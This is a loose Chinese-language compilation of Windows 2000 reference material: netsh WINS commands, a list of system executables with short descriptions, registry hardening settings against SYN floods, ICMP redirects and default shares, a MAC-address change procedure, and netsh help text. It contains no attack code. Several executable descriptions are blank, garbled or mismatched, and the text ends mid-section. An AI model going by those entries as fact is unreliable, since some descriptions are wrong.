set pullparam 设置服务器的默认"拉"参数。详细信息,请输入 set pullparam /?
set pushparam 设置服务器的默认"推"参数。详细信息,请输入 set pushparam /?
set replicateflag 设置服务器的复制标志。详细信息,请输入 set replicateflag /?
set startversion 设置数据库的开始版本 ID。详细信息,请输入 set startversion /?
show browser 显示所有活动域主浏览器的 [1Bh] 记录。详细信息,请输入 show browser /?
show database 显示指定服务器的数据库和记录。详细信息,请输入 show database /?
show info 显示配置信息。详细信息,请输入 show info /?
show name 显示服务器中特定记录的详细信息。详细信息,请输入 show name /?
show partner 显示服务器的"拉"或"推"(或"推拉")伙伴。详细信息,请输入 show partner /?
show partnerproperties 显示默认伙伴配置。详细信息,请输入 show partnerproperties /?
show pullpartnerconfig 显示"拉"伙伴的配置信息。详细信息,请输入 show pullpartnerconfig /?
show pushpartnerconfig 显示"推"伙伴的配置信息。详细信息,请输入 show pushpartnerconfig /?
show reccount 显示指定服务器所拥有的记录数量。详细信息,请输入 show reccount /?
show recbyversion 显示指定服务器所拥有的记录。详细信息,请输入 show recbyversion /?
show server 显示当前选定的服务器。详细信息,请输入 show server /?
show statistics 显示 WINS 服务器的统计信息。详细信息,请输入 show statistics /?
show version 显示 WINS 服务器的当前版本计数器值。详细信息,请输入 show version /?
show versionmap 显示所有者 ID 到"最大版本数"的映射。详细信息,请输入 show versionmap /?
Interface 命令
interface set/show interface 启用、禁用、连接、断开连接以及显示请求拨号接口的配置。
interface set/show credentials 在请求拨号接口上配置或显示用户名、密码和域名。
Win2000命令全集
accwiz.exe > Accessibility Wizard for walking you through setting up your machine for your mobility needs. 辅助工具向导
acsetups.exe > ACS setup DCOM server executable
actmovie.exe > Direct Show setup tool 直接显示安装工具
append.exe > Allows programs to open data in specified directories as if they were in the current directory. 允许程序打开制定目录中的数据
arp.exe > NETWORK Display and modify IP - Hardware addresses 显示和更改计算机的IP与硬件物理地址的对应列表
at.exe > AT is a scheduling utility also included with UNIX 计划运行任务
atmadm.exe > Displays statistics for ATM call manager. ATM调用管理器统计
attrib.exe > Display and modify attributes for files and folders 显示和更改文件和文件夹属性
autochk.exe > Used to check and repair Windows File Systems 检测修复文件系统
autoconv.exe > Automates the file system conversion during reboots 在启动过程中自动转化系统
autofmt.exe > Automates the file format process during reboots 在启动过程中格式化进程
autolfn.exe > Used for formatting long file names 使用长文件名格式
bootok.exe > Boot acceptance application for registry bootvrfy.exe > Bootvrfy.exe, a program included in Windows 2000 that notifies the system that startup was successful. Bootvrfy.exe can be run on a local or remote computer. 通报启动成功
cacls.exe > Displays or modifies access control lists (ACLs) of files. 显示和编辑ACL
calc.exe > Windows Calculators 计算器
cdplayer.exe > Windows CD Player CD播放器
change.exe > Change { User | Port | Logon } 与终端服务器相关的查询
charmap.exe > Character Map 字符映射表
chglogon.exe > Same as using "Change Logon" 启动或停用会话记录
chgport.exe > Same as using "Change Port" 改变端口(终端服务)
chgusr.exe > Same as using "Change User" 改变用户(终端服务)
chkdsk.exe > Check the hard disk for errors similar to Scandisk 3 Stages must specify a Drive Letter 磁盘检测程序
chkntfs.exe > Same as using chkdsk but for NTFS NTFS磁盘检测程序
cidaemon.exe > Component of Ci Filer Service 组成Ci文档服务
cipher.exe > Displays or alters the encryption of directories [files] on NTFS partitions. 在NTFS上显示或改变加密的文件或目录
cisvc.exe > Content Index -- It's the content indexing service for I 索引内容
ckcnv.exe > Cookie Convertor 变换Cookie
cleanmgr.exe > Disk Cleanup, popular with Windows 98 磁盘清理
cliconfg.exe > SQL Server Client Network Utility SQL客户网络工具 clipbrd.exe > Clipboard viewer for Local will allow you to connect to other clipboards 剪贴簿查看
clipsrv.exe > Start the clipboard Server 运行Clipboard服务
clspack.exe > CLSPACK used to create a file listing of system packages 建立系统文件列表清
cluster.exe > Display a cluster in a domain 显示域的集群
_cmd_.exe > Famous command prompt 没什么好说的!
cmdl32.exe > Connection Manager Auto-Download 自动下载连接管理
cmmgr32.exe > Connection Manager 连接管理器
cmmon32.exe > Connection Manager Monitor 连接管理器监视
cmstp.exe > Connection Manager Profile Manager 连接管理器配置文件安装程序
comclust.exe > about cluster server 集群
comp.exe > ComClust Add, Remove, or Join a cluster. 比较两个文件和文件集的内容*
compact.exe > Displays or alters the compression of files on NTFS partitions. 显示或改变NTFS分区上文件的压缩状态
conime.exe > Console IME IME控制台
control.exe > Starts the control panel 控制面板
convert.exe > Convert File System to NTFS 转换文件系统到NTFS
convlog.exe > Converts MS IIS log files 转换IIS日志文件格式到NCSA格式
cprofile.exe > Copy profiles 转换显示模式
cscript.exe > MS Windows Scripts Host Version 5.1 较本宿主版本
csrss.exe > Client Server Runtime Process 客户服务器Runtime进程
csvde.exe > Comma Separated Variable Import/Export Utility 日至格式转换程序
dbgtrace.exe > 和Terminal Server相关
dcomcnfg.exe > Display the current DCOM configuration. DCOM配置属性
dcphelp.exe > ?
dcpromo.exe > Promote a domain controller to ADSI AD安装向导
ddeshare.exe > Display DDE shares on local or remote computer DDE共享
ddmprxy.exe >
debug.exe > Runs Debug, a program testing and editing tool. 就是DEBUG啦!
dfrgfat.exe > Defrag FAT file system FAT分区磁盘碎片整理程序
dfrgntfs.exe > Defrag NTFS file system NTFS分区磁盘碎片整理程序
dfs_cmd_.exe > configures a Dfs tree 配置一个DFS树
dfsinit.exe > Distributed File System Initialization 分布式文件系统初始化
dfssvc.exe > Distributed File System Server 分布式文件系统服务器
diantz.exe > MS Cabinet Maker 制作CAB文件
diskperf.exe > Starts physical Disk Performance counters 磁盘性能计数器
dllhost.exe > dllhost is used on all versions of Windows 2000. dllhost is the hedost process for all COM+ applications. 所有COM+应用软件的主进程
dllhst3g.exe >
网络常用命令:
dmadmin.exe > Disk Manager Service 磁盘管理服务
dmremote.exe > Part of disk management 磁盘管理服务的一部分
dns.exe > DNS Applications DNS
doskey.exe > recalls Windows command lines and creates macros 命令行创建宏
dosx.exe > DOS Extender DOS扩展
dplaysvr.exe > Direct Play Helper 直接运行帮助
drwatson.exe > Dr Watson for 2000 Fault Detector 华生医生错误检测
drwtsn32.exe > Dr Watson for 2000 viewer and configuration manager 华生医生显示和配置管理
dtcsetup.exe > Installs MDTC
dvdplay.exe > Windows 2000 DVD player DVD播放
dxdiag.exe > Direct-X Diagnostics Direct-X诊断工具
edlin.exe > line-oriented text editor. 命令行的文本编辑器(历史悠久啊!)
edlin.exe > line-oriented text editor. 命令行的文本编辑器(历史悠久啊!)
esentutl.exe > MS Database Utility MS数据库工具
eudcedit.exe > Private character editor Ture Type造字程序
eventvwr.exe > Windows 2000 Event Viewer 事件查看器
evnt_cmd_.exe > Event to trap translator; Configuration tool
evntwin.exe > Event to trap translator setup
exe2bin.exe > Converts EXE to binary format 转换EXE文件到二进制
expand.exe > Expand Files that have been compressed 解压缩
extrac32.exe > CAB File extraction utility 解CAB工具
fastopen.exe > Fastopen tracks the location of files on a hard disk and stores the information in memory for fast access. 快速访问在内存中的硬盘文件
faxcover.exe > Fax Cover page editor 传真封面编辑
faxqueue.exe > Display Fax Queue 显示传真队列
faxsend.exe > Fax Wizard for sending faxes 发送传真向导
faxsvc.exe > Starts fax server 启动传真服务
fc.exe > Compares two files or sets of files and their differences 比较两个文件的不同
find.exe > Searches for a text string in file or files 查找文件中的文本行
findstr.exe > Searches for strings in files 查找文件中的行
finger.exe > Fingers a user and displays statistics on that user Finger一个用户并显示出统计结果
fixmapi.exe > Fix mapi files 修复MAPI文件
flattemp.exe > Enable or disable temporally directories 允许或者禁用临时文件目录
fontview.exe > Display fonts in a font file 显示字体文件中的字体
forcedos.exe > Forces a file to start in dos mode. 强制文件在DOS模式下运行
freecell.exe > Popular Windows Game 空当接龙
ftp.exe > File Transfer Protocol used to transfer files over a network connection 就是FTP了
gdi.exe > Graphic Device Interface 图形界面驱动
grovel.exe >
grpconv.exe > Program Manager Group Convertor 转换程序管理员组
help.exe > displays help for Windows 2000 commands 显示帮助
hostname.exe > Display hostname for machine. 显示机器的Hostname
ie4uinit.exe > IE5 User Install tool IE5用户安装工具
ieshwiz.exe > Customize folder wizard 自定义文件夹向导
iexpress.exe > Create and setup packages for install 穿件安装包
iisreset.exe > Restart IIS Admin Service 重启IIS服务
internat.exe > Keyboard Language Indicator Applet 键盘语言指示器
ipconfig.exe > Windows 2000 IP configuration. 察看IP配置
ipsecmon.exe > IP Security Monitor IP安全监视器
ipxroute.exe > IPX Routing and Source Routing Control Program IPX路由和源路由控制程序
irftp.exe > Setup FTP for wireless communication 无线连接
ismserv.exe > Intersite messaging Service 安装或者删除Service Control Manager中的服务
jdbgmgr.exe > Microsoft debugger for java 4 Java4的调试器
jetconv.exe > Convert a Jet Engine Database 转换Jet Engine数据库
jetpack.exe > Compact Jet Database. 压缩Jet数据库
jview.exe > Command-line loader for Java Java的命令行装载者
krnl386.exe > Core Component for Windows 2000 2000的核心组件
label.exe > Change label for drives 改变驱动器的卷标
lcwiz.exe > License Compliance Wizard for local or remote systems. 许可证符合向导
ldifde.exe > LDIF cmd line manager LDIF目录交换命令行管理
licmgr.exe > Terminal Server License Manager 终端服务许可协议管理
lights.exe > display connection status lights 显示连接状况
llsmgr.exe > Windows 2000 License Manager 2000许可协议管理
llssrv.exe > Start the license Server 启动许可协议服务器
lnkstub.exe >
locator.exe > RPC Locator 远程定位
lodctr.exe > Load perfmon counters 调用性能计数
logoff.exe > Log current user off. 注销用户
lpq.exe > Displays status of a remote LPD queue 显示远端的LPD打印队列的状态,显示被送到基于Unix的服务器的打印任务
lpr.exe > Send a print job to a network printer. 重定向打印任务到网络中的打印机。通常用于Unix客户打印机将打印任务发送给连接了打印设备的NT的打印机服务器。
lsass.exe > LSA Executable and Server DLL 运行LSA和Server的DLL
lserver.exe > Specifies the new DNS domain for the default server 指定默认Server新的DNS域
macfile.exe > Used for managing MACFILES 管理MACFILES
magnify.exe > Used to magnify the current screen 放大镜
makecab.exe > MS Cabinet Maker 制作CAB文件
mdm.exe > Machine Debug Manager 机器调试管理
mem.exe > Display current Memory stats 显示内存状态
migpwd.exe > Migrate passwords. 迁移密码
mmc.exe > Microsoft Management Console 控制台
mnmsrvc.exe > Netmeeting Remote Desktop Sharing NetMeeting远程桌面共享
mobsync.exe > Manage Synchronization. 同步目录管理器
mountvol.exe > Creates, deletes, or lists a volume mount point. 创建、删除或列出卷的装入点。
mplay32.exe > MS Media Player 媒体播放器
mpnotify.exe > Multiple Provider Notification application 多提供者通知应用程序
mq1sync.exe >
mqbkup.exe > MS Message Queue Backup and Restore Utility 信息队列备份和恢复工具
mqexchng.exe > MSMQ Exchange Connector Setup 信息队列交换连接设置
mqmig.exe > MSMQ Migration Utility 信息队列迁移工具
mqsvc.exe > ?
mrinfo.exe > Multicast routing using SNMP 使用SNMP多点传送路由
mscdexnt.exe > Installs MSCD (MS CD Extensions) 安装MSCD
msdtc.exe > Dynamic Transaction Controller Console 动态事务处理控制台
msg.exe > Send a message to a user local or remote. 发送消息到本地或远程客户
mshta.exe > HTML Application HOST HTML应用程序主机
msiexec.exe > Starts Windows Installer Program 开始Windows安装程序
mspaint.exe > Microsoft Paint 画板
msswchx.exe >
mstask.exe > Task Schedule Program 任务计划表程序
mstinit.exe > Task scheduler setup 任务计划表安装
narrator.exe > Program will allow you to have a narrator for reading. Microsoft讲述人
nbtstat.exe > Displays protocol stats and current TCP/IP connections using NBT 使用 NBT(TCP/IP 上的 NetBIOS)显示协议统计和当前 TCP/IP 连接。
nddeapir.exe > NDDE API Server side NDDE API服务器端
net.exe > Net Utility 详细用法看/?
net1.exe > Net Utility updated version from MS Net的升级版
netdde.exe > Network DDE will install itself into the background 安装自己到后台
netsh.exe > Creates a shell for network information 用于配置和监控 Windows 2000 命令行脚本接口。
netstat.exe > Displays current connections. 显示协议统计和当前的 TCP/IP 网络连接。
nlsfunc.exe > Loads country-specific information 加载特定国家(地区)的信息。Windows 2000 和 MS-DOS 子系统不使用该命令。接受该命令只是为了与 MS-DOS 文件兼容。
notepad.exe > Opens Windows 2000 Notepad 记事本
nslookup.exe > Displays information for DNS 该诊断工具显示来自域名系统 (DNS) 名称服务器的信息。
ntbackup.exe > Opens the NT Backup Utility 备份和故障修复工具
ntbooks.exe > Starts Windows Help Utility 帮助
ntdsutil.exe > Performs DB maintenance of the ADSI 完成ADSI的DB的维护
ntfrs.exe > NT File Replication Service NT文件复制服务
ntfrsupg.exe >
ntkrnlpa.exe > Kernel patch 核心补丁
ntoskrnl.exe > Core NT Kernel KT的核心
ntsd.exe >
ntvdm.exe > Simulates a 16-bit Windows environment 模拟16位Windows环境
nw16.exe > Netware Redirector NetWare转向器
nwscript.exe > runs netware scripts 运行Netware脚本
odbcad32.exe > ODBC 32-bit Administrator 32位ODBC管理
odbcconf.exe > Configure ODBC driver's and data source's from command line 命令行配置ODBC驱动和数据源
os2.exe > An OS/2 Warp Server (os2 /o) OS/2
os2srv.exe > An OS/2 Warp Server OS/2
os2ss.exe > An OS/2 Warp Server OS/2
osk.exe > On Screen Keyboard 屏幕键盘
packager.exe > Windows 2000 Packager Manager 对象包装程序
pathping.exe > Combination of Ping and Tracert 包含Ping和Tracert的程序
pax.exe > is a POSIX program and path names used as arguments must be specified in POSIX format. Use "file://C/Users/Default" instead of "C:\USERS\DEFAULT." 启动便携式存档互换 (Pax) 实用程序
pentnt.exe > Used to check the Pentium for the floating point division error. 检查Pentium的浮点错误
perfmon.exe > Starts Windows Performance Monitor 性能监视器
ping.exe > Packet Internet Groper 验证与远程计算机的连接
posix.exe > Used for backward compatibility with Unix 用于兼容Unix
print.exe > Cmd line used to print files 打印文本文件或显示打印队列的内容。
progman.exe > Program manager 程序管理器
proquota.exe > Profile quota program
psxss.exe > POSIX Subsystem Application Posix子系统应用程序
qappsrv.exe > Displays the available application terminal servers on the network
在网络上显示终端服务器可用的程序
qprocess.exe > Display information about processes local or remote 在本地或远程显示进程的信息(需终端服务)
query.exe > Query TERMSERVER user process and sessions 查询进程和对话
quser.exe > Display information about a user logged on 显示用户登陆的信息(需终端服务)
qwinsta.exe > Display information about Terminal Sessions. 显示终端服务的信息
rasadmin.exe > Start the remote access admin service 启动远程访问服务
rasautou.exe > Creates a RAS connection 建立一个RAS连接
rasdial.exe > Dial a connection 拨号连接
rasphone.exe > Starts a RAS connection 运行RAS连接
rcp.exe > Copies a file from and to a RCP service. 在 Windows 2000 计算机和运行远程外壳端口监控程序 rshd 的系统之间复制文件
rdpclip.exe > RdpClip allows you to copy and paste files between a terminal session and client console session. 再终端和本地复制和粘贴文件
recover.exe > Recovers readable information from a bad or defective disk 从坏的或有缺陷的磁盘中恢复可读取的信息。
redir.exe > Starts the redirector service 运行重定向服务
regedt32.exe > 32-bit register service 32位注册服务
regini.exe > modify registry permissions from within a script 用脚本修改注册许可
register.exe > Register a program so it can have special execution characteristics. 注册包含特殊运行字符的程序
regsvc.exe >
regsvr32.exe > Registers and unregister's dll's. As to how and where it register's them I dont know. 注册和反注册DLL
regtrace.exe > Options to tune debug options for applications failing to dump trace statements
Trace 设置
regwiz.exe > Registration Wizard 注册向导
remrras.exe >
replace.exe > Replace files 用源目录中的同名文件替换目标目录中的文件。
reset.exe > Reset an active section 重置活动部分
rexec.exe > Runs commands on remote hosts running the REXEC service. 在运行 REXEC 服务的远程计算机上运行命令。rexec 命令在执行指定命令前,验证远程计算机上的用户名,只有安装了 TCP/IP 协议后才可以使用该命令。
risetup.exe > Starts the Remote Installation Service Wizard. 运行远程安装向导服务
route.exe > display or edit the current routing tables. 控制网络路由表
routemon.exe > no longer supported 不再支持了!
router.exe > Router software that runs either on a dedicated DOS or on an OS/2 system. Route软件在 DOS或者是OS/2系统
rsh.exe > Runs commands on remote hosts running the RSH service 在运行 RSH 服务的远程计算机上运行命令
rsm.exe > Mounts and configures remote system media 配置远程系统媒体
rsnotify.exe > Remote storage notification recall 远程存储通知回显
rsvp.exe > Resource reservation protocol 源预约协议
runas.exe > RUN a program as another user 允许用户用其他权限运行指定的工具和程序
rundll32.exe > Launches a 32-bit dll program 启动32位DLL程序
runonce.exe > Causes a program to run during startup 运行程序再开始菜单中
rwinsta.exe > Reset the session subsystem hardware and software to known initial values 重置会话子系统硬件和软件到最初的值
savedump.exe > Does not write to e:\winnt\user.dmp 不写入User.dmp中
scardsvr.exe > Smart Card resource management server 子能卡资源管理服务器
schupgr.exe > It will read the schema update files (.ldf files) and upgrade the schema. (part of ADSI) 读取计划更新文件和更新计划
secedit.exe > Starts Security Editor help 自动安全性配置管理
services.exe > Controls all the services 控制所有服务
sethc.exe > Set High Contrast - changes colours and display mode Logoff to set it back to normal 设置高对比
setreg.exe > Shows the Software Publishing State Key Values 显示软件发布的国家语言
setup.exe > GUI box prompts you to goto control panel to configure system components 安装程序(转到控制面板)
setver.exe > Set Version for Files 设置 MS-DOS 子系统向程序报告的 MS-DOS 版本号
sfc.exe > System File Checker test and check system files for integrity 系统文件检查
sfmprint.exe > Print Services for Macintosh 打印Macintosh服务
sfmpsexe.exe >
sfmsvc.exe >
shadow.exe > Monitor another Terminal Services session. 监控另外一台中端服务器会话
share.exe > Windows 2000 和 MS-DOS 子系统不使用该命令。接受该命令只是为了与 MS-DOS 文件兼容
shmgrate.exe >
shrpubw.exe > Create and Share folders 建立和共享文件夹
sigverif.exe > File Signature Verification 文件签名验证
skeys.exe > Serial Keys utility 序列号制作工具
smlogsvc.exe > Performance Logs and Alerts 性能日志和警报
smss.exe >
sndrec32.exe > starts the Windows Sound Recorder 录音机
sndvol32.exe > Display the current volume information 显示声音控制信息
snmp.exe > Simple Network Management Protocol used for Network Mangement 简单网络管理协议
snmptrap.exe > Utility used with SNMP SNMP工具
sol.exe > Windows Solitaire Game 纸牌
sort.exe > Compares files and Folders 读取输入、排序数据并将结果写到屏幕、文件和其他设备上
SPOOLSV.EXE > Part of the spooler service for printing 打印池服务的一部分
sprestrt.exe >
srvmgr.exe > Starts the Windows Server Manager 服务器管理器
stimon.exe > WDM StillImage- > Monitor
stisvc.exe > WDM StillImage- > Service
subst.exe > Associates a path with a drive letter 将路径与驱动器盘符关联
svchost.exe > Svchost.exe is a generic host process name for services that are run from dynamic-link libraries (DLLs). DLL得主进程
syncapp.exe > Creates Windows Briefcase. 创建Windows文件包
sysedit.exe > Opens Editor for 4 system files 系统配置编辑器
syskey.exe > Encrypt and secure system database NT账号数据库按群工具
sysocmgr.exe > Windows 2000 Setup 2000安装程序
systray.exe > Starts the systray in the lower right corner. 在低权限运行systray
taskman.exe > Task Manager 任务管理器
taskmgr.exe > Starts the Windows 2000 Task Manager 任务管理器
tcmsetup.exe > telephony client wizard 电话服务客户安装
tcpsvcs.exe > TCP Services TCP服务
.exe > Telnet Utility used to connect to Telnet Server
termsrv.exe > Terminal Server 终端服务
tftp.exe > Trivial FTP 将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行 TFTP 服务的远程计算机传输文件
tftpd.exe > Trivial FTP Daemon
themes.exe > Change Windows Themes 桌面主题
tlntadmn.exe > Telnet Server Administrator Telnet服务管理
tlntsess.exe > Display the current Telnet Sessions 显示目前的Telnet会话
tlntsvr.exe > Start the Telnet Server 开始Telnet服务
tracert.exe > Trace a route to display paths 该诊断实用程序将包含不同生存时间 (TTL) 值的 Internet 控制消息协议 (ICMP) 回显数据包发送到目标,以决定到达目标采用的路由
tsadmin.exe > Terminal Server Administrator 终端服务管理器
tscon.exe > Attaches a user session to a terminal session. 粘贴用户会话到终端对话
tsdiscon.exe > Disconnect a user from a terminal session 断开终端服务的用户
tskill.exe > Kill a Terminal server process 杀掉终端服务
tsprof.exe > Used with Terminal Server to query results. 用终端服务得出查询结果
tsshutdn.exe > Shutdown the system 关闭系统
unlodctr.exe > Part of performance monitoring 性能监视器的一部分
upg351db.exe > Upgrade a jet database 升级Jet数据库
ups.exe > UPS service UPS服务
user.exe > Core Windows Service Windows核心服务
userinit.exe > Part of the winlogon process Winlogon进程的一部分
usrmgr.exe > Start the windows user manager for domains 域用户管理器
utilman.exe > This tool enables an administrator to designate which computers automatically open accessibility tools when Windows 2000 starts. 指定2000启动时自动打开那台机器
verifier.exe > Driver Verifier Manager Driver Verifier Manager
vwipxspx.exe > Loads IPX/SPX VDM 调用IPX/SPX VDM
w32tm.exe > Windows Time Server 时间服务器
wextract.exe > Used to extract windows files 解压缩Windows文件
winchat.exe > Opens Windows Chat 打开Windows聊天
winhlp32.exe > Starts the Windows Help System 运行帮助系统
winlogon.exe > Used as part of the logon process. Logon进程的一部分
winmine.exe > windows Game 挖地雷
winmsd.exe > Windows Diagnostic utility 系统信息
wins.exe > Wins Service Wins服务
winspool.exe > Print Routing 打印路由
winver.exe > Displays the current version of Windows 显示Windows版本
wizmgr.exe > Starts Windows Administration Wizards Windows管理向导
wjview.exe > Command line loader for Java 命令行调用Java
wowdeb.exe > . For starters, the 32-bit APIs require that the WOWDEB.EXE task runs in the target debugee's VM 启动时,32位API需要
wowexec.exe > For running Windows over Windows Applications 在Windows应用程序上运行Windows
wpnpinst.exe > ?
write.exe > Starts MS Write Program 写字板
wscript.exe > Windows Scripting Utility 脚本工具
wupdmgr.exe > Starts the Windows update Wizard (Internet) 运行Windows升级向导
xcopy.exe > Used to copy directories 复制文件和目录,包括子目录
1、设置生存时间
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
DefaultTTL REG_DWORD 0-0xff(0-255 十进制,默认值128)
说明:指定传出IP数据包中设置的默认生存时间(TTL)值。TTL决定了IP数据包在到达目标前在网络中生存的最大时间。它实际上限定了IP数据包在丢弃前允许通过的路由器数量.有时利用此数值来探测远程主机操作系统。 2、防止ICMP重定向报文的攻击
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
EnableICMPRedirects REG_DWORD 0x0(默认值为0x1)
说明:该参数控制Windows 2000是否会改变其路由表以响应网络设备(如路由器)发送给它的ICMP重定向消息,有时会被利用来干坏事.Win2000中默认值为1,表示响应ICMP重定向报文。
3、禁止响应ICMP路由通告报文
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Inter
faces\interface
PerformRouterDiscovery REG_DWORD 0x0(默认值为0x2)
说明:"ICMP路由公告"功能可造成他人计算机的网络连接异常,数据被窃听,计算机被用于流量攻击等严重后果.此问题曾导致校园网某些局域网大面积,长时间的网络异常。因此建议关闭响应ICMP路由通告报文.Win2000中默认值为2,表示当DHCP发送路由器发现选项时启用。
4、防止SYN洪水攻击
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
SynAttackProtect REG_DWORD 0x2(默认值为0x0)
说明:SYN攻击保护包括减少SYN-ACK重新传输次数,以减少分配资源所保留的时间。路由缓存项资源分配延迟,直到建立连接为止.如果synattackprotect=2,则AFD的连接指示一直延迟到三路握手完成为止.注意,仅在TcpMaxHalfOpen和TcpMaxHalfOpenRetried设置超出范围时,保护机制才会采取措施。
5、禁止C$、D$一类的缺省共享
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
AutoShareServer、REG_DWORD、0x0
6、禁止ADMIN$缺省共享
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
AutoShareWks、REG_DWORD、0x0
7、限制IPC$缺省共享
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
restrictanonymous REG_DWORD 0x0 缺省
0x1 匿名用户无法列举本机用户列表
0x2 匿名用户无法连接本机IPC$共享
说明:不建议使用2,否则可能会造成你的一些服务无法启动,如SQL Server
8、不支持IGMP协议
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
IGMPLevel REG_DWORD 0x0(默认值为0x2)
说明:记得Win9x下有个bug,就是用可以用IGMP使别人蓝屏,修改注册表可以修正这个bug.Win2000虽然没这个bug了,但IGMP并不是必要的,因此照样可以去掉。改成0后用route print将看不到那个讨厌的224.0.0.0项了。
9、设置arp缓存老化时间设置
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters
ArpCacheLife REG_DWORD 0-0xFFFFFFFF(秒数,默认值为120秒)
ArpCacheMinReferencedLife REG_DWORD 0-0xFFFFFFFF(秒数,默认值为600)
说明:如果ArpCacheLife大于或等于ArpCacheMinReferencedLife,则引用或未引用的ARP缓存项在ArpCacheLife秒后到期。如果ArpCacheLife小于ArpCacheMinReferencedLife,未引用项在ArpCacheLife秒后到期,而引用项在ArpCacheMinReferencedLife秒后到期。每次将出站数据包发送到项的IP地址时,就会引用ARP缓存中的项。
10、禁止死网关监测技术
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters
EnableDeadGWDetect REG_DWORD 0x0(默认值为ox1)
说明:如果你设置了多个网关,那么你的机器在处理多个连接有困难时,就会自动改用备份网关。有时候这并不是一项好主意,建议禁止死网关监测。
11、不支持路由功能
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters
IPEnableRouter REG_DWORD 0x0(默认值为0x0)
说明:把值设置为0x1可以使Win2000具备路由功能,由此带来不必要的问题。
12、做NAT时放大转换的对外端口最大值
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters
MaxUserPort REG_DWORD 5000-65534(十进制)(默认值0x1388--十进制为5000)
说明:当应用程序从系统请求可用的用户端口数时,该参数控制所使用的最大端口数。正常情况下,短期端口的分配数量为1024-5000。将该参数设置到有效范围以外时,就会使用最接近的有效数值(5000或65534)。使用NAT时建议把值放大点。
13、修改MAC地址
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\
找到右窗口的说明为"网卡"的目录,
比如说是{4D36E972-E325-11CE-BFC1-08002BE10318}
展开之,在其下的0000,0001,0002...的分支中找到"DriverDesc"的键值为你网卡的说明,比如说"DriverDesc"的值为"Intel(R) 82559 Fast Ethernet LAN on Motherboard"然后在右窗口新建一字符串值,名字为"Networkaddress",内容为你想要的MAC值,比如说是"004040404040"然后重起计算机,ipconfig /all看看。
曾几何时,大家都有想过在命令行下改IP和网关。以前在NT4下实现起来过于麻烦,现在Windows 2000下的Netsh命令能实现该功能了。
Netsh 是本地或远程计算机的 Windows 2000 网络组件的命令行和脚本实用程序。为了存档或配置其他服务器,Netsh 实用程序也可以将配置脚本保存在文本文件中。
Netsh 实用程序是一个外壳,它通过附加的"Netsh 帮助 DLL",可以支持多个 Windows 2000 组件。"Netsh 帮助 DLL"提供用来监视或配置特定 Windows 2000 网络组件的其他命令,从而扩展了 Netsh 的功能。每个"Netsh 帮助 DLL"都为特定的网络组件提供了一个环境和一组命令。每个环境中都可以有子环境。例如,在路由环境中存在子环境 Ip 和 Ipx,它们将 IP 路由和 IPX 路由命令集中在一起。
Netsh 命令行选项包括下列各项:
用法: netsh [-a AliasFile] [-c Context] [-r RemoteMachine]
[Command | -f ScriptFile]
下列指令有效:
此上下文中的命令:
? - 显示命令列表。
aaaa - 更改到 `aaaa' 上下文。
add - 将一个配置项添加到项目列表中。
delete - 在项目列表上删除一个配置项目。
dhcp - 更改到 `dhcp' 上下文。
dump 0 - 显示一个配置脚本。
exec - 运行一个脚本文件。
help - 显示命令列表。
interface - 更改到 `interface' 上下文。
ras - 更改到 `ras' 上下文。
routing - 更改到 `routing' 上下文。
set - 更新配置设置。
show - 显示信息
wins - 更改到 `wins' 上下文。
下列的子上下文可用:
routing interface ras dhcp wins aaaa
若需要命令的更多帮助信息,请键入命令,
后面跟 ?。
-a AliasFile
指定使用了一个别名文件。别名文件包含 netsh 命令列表和一个别名版本,所以可以使用别名命令行替换 netsh 命令。可以使用别名文件将其他平台中更熟悉的命令映射到适当的 netsh 命令。
-c Context
指定对应于已安装的支持 DLL 的命令环境。
命令
指定要执行的 netsh 命令。
-f ScriptFile
指定运行 ScriptFile 文件中所有的 netsh 命令。
-r RemoteMachine
指定在远程计算机上运行 netsh 命令,由名称或 IP 地址来指定远程计算机。
您可以将命令缩写为意义明确的最短的字符串。例如,发布 sh ip int 命令相当于发布 show ip interface。Netsh 命令可以是全局的或特定环境的。全局命令可以在任何环境中发布,并用于一般的 Netsh 实用程序功能。特定环境的命令随环境而变化。您可以将发布的命令记录在日志文件中,以创建 netsh 命令会话的审核踪迹。
列出了 netsh 全局命令。
命令 说明
.. 上移一个环境等级。
? 或 help 显示命令行"帮助"。
show version 显示 Windows 和 Netsh 实用程序的当前版本。
show netdlls 显示已安装的"Netsh 帮助 DLL"的当前版本。
add helper 添加"Netsh 帮助 DLL"。
delete helper 删除"Netsh 帮助 DLL"。
show helper 显示已安装的"Netsh 帮助 DLL"。
cmd 创建 Windows 2000 命令窗口。
online 将当前模式设置为联机。
offline 将当前模式设置为脱机。
set mode 将当前模式设置为联机或脱机。
show mode 显示当前模式。
flush 丢弃以脱机模式进行的任何更改。
commit 提交以脱机模式进行的更改。
set audit-logging 打开或关闭记录工具。
show audit-logging 显示当前的审核记录设置。
set loglevel 设置记录信息的级别
show loglevel 显示记录信息的级别。
set machine 配置执行 netsh 命令的计算机。
show machine 显示执行 netsh 命令的计算机。
exec 执行包括 netsh 命令的脚本文件。
quit 或 bye 或 exit 退出 Netsh 实用程序。
add alias 向现有命令添加别名。
delete alias 删除现有命令的别名。
show alias 显示所有已定义的别名。
dump 将配置写入文本文件。
popd 从堆栈中弹出环境的脚本命令。
pushd 将当前的环境推入堆栈的脚本命令。
Netsh 实用程序有如下命令模式:
联机
联机模式下,在 Netsh 命令提示符下发布的命令被立即执行。
脱机
脱机模式下,将在 Netsh 命令提示符下积累发布的命令,并通过发布 commit 全局命令来按照批处理方式执行。可以通过发布 flush 全局命令来丢弃积累的命令。
脚本
